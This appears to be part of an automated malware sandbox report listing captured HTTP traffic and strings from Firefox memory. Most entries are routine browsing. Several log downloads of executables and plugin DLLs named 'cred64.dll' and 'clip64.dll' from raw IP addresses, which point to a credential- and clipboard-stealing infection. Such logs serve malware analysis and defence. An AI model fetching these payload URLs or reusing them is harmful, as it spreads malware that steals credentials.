Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&ctier=L&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&ctier=L&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cEE23?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000005BBC5BB4AD HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /mine/amer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.215.113.68Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cost/go.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 109.107.182.3Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /theme/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.68
Source: global traffic	HTTP traffic detected: GET /theme/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.68
Source: global traffic	HTTP traffic detected: GET /autorun.exe HTTP/1.1Host: 194.33.191.102
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000030.00000002.2593916370.000001838BEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com equals www.youtube.com (Youtube)
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com$ equals www.youtube.com (Youtube)
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/YouTubemoc.ebutuoy.www. equals www.youtube.com (Youtube)
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/moc.ebutuoy.www. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000003.2448815938.0000023A251FB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.2449056909.0000023A25210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.2454374100.0000023A25211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %7n7https://www.facebook.com/login --attempting-deelevationUser equals www.facebook.com (Facebook)
Source: chromecache_943.22.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/A4tfXiHOGrs/ equals www.facebook.com (Facebook)
Source: chromecache_943.22.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/Ga6vBwdwgUx/ equals www.facebook.com (Facebook)
Source: chromecache_1001.22.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/OKBVmODmb-W/ equals www.facebook.com (Facebook)
Source: chromecache_962.22.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/WRsJ32R7YJG/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000003.2604866040.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2On= equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "&label=videoskipped&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ib+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],closePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adclose&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}],progressPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2521929587.0000026F4ABBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://.imgur.com/js/vendor..bundle.js""://js.maxmind.com/js/apis/geoip2//geoip2.js""://www.rva311.com/static/js/main..chunk.js""://libs.coremetrics.com/eluminate.js""://www.google-analytics.com/analytics.js""://www.google-analytics.com/gtm/js""://www.google-analytics.com/plugins/ua/ec.js""://s0.2mdn.net/instream/html5/ima3.js""://imasdk.googleapis.com/js/sdkloader/ima3.js""://static.adsafeprotected.com/iasPET.1.js""://s.webtrends.com/js/webtrends.min.js""://.moatads.com//moatapi.js""://www.googletagservices.com/tag/js/gpt.js""://.vidible.tv//vidible-min.js""://www.googletagmanager.com/gtm.js""://cdn.adsafeprotected.com/iasPET.1.js""://cdn.optimizely.com/public/.js""://.moatads.com//moatheader.js""://s.webtrends.com/js/advancedLinkTracking.js""://s.webtrends.com/js/webtrends.js""://connect.facebook.net//sdk.js""://.imgur.io/js/vendor..bundle.js""://ssl.google-analytics.com/ga.js""://adservex.media.net/videoAds.js""://connect.facebook.net//all.js" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "=",adInfoRenderer:{adHoverTextButtonRenderer:{button:{buttonRenderer:{style:"STYLE_UNKNOWN",size:"SIZE_DEFAULT",isDisabled:!1,icon:{iconType:"INFO_OUTLINE"},navigationEndpoint:{clickTrackingParams:Bc,openPopupAction:{popup:{aboutThisAdRenderer:{url:(Td.privateDoNotAccessOrElseTrustedResourceUrlWrappedValue="https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A"+T+"&hl="+Ga+"&origin=www.youtube.com&ata_theme="+He,Td),trackingParams:hb+"="}},popupType:"DIALOG"}},trackingParams:hb+"="}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "="},trackingParams:hb+"="}},adLayoutLoggingData:{serializedAdServingDataEntry:ed},skipPings:[{baseUrl:"https://www.youtube.com/pagead/int equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "="},trackingParams:hb+"="}},adLayoutLoggingData:{serializedAdServingDataEntry:ed},skipPings:[{baseUrl:"https://www.youtube.com/pagead/interaction equals www.youtube.com (Youtube)
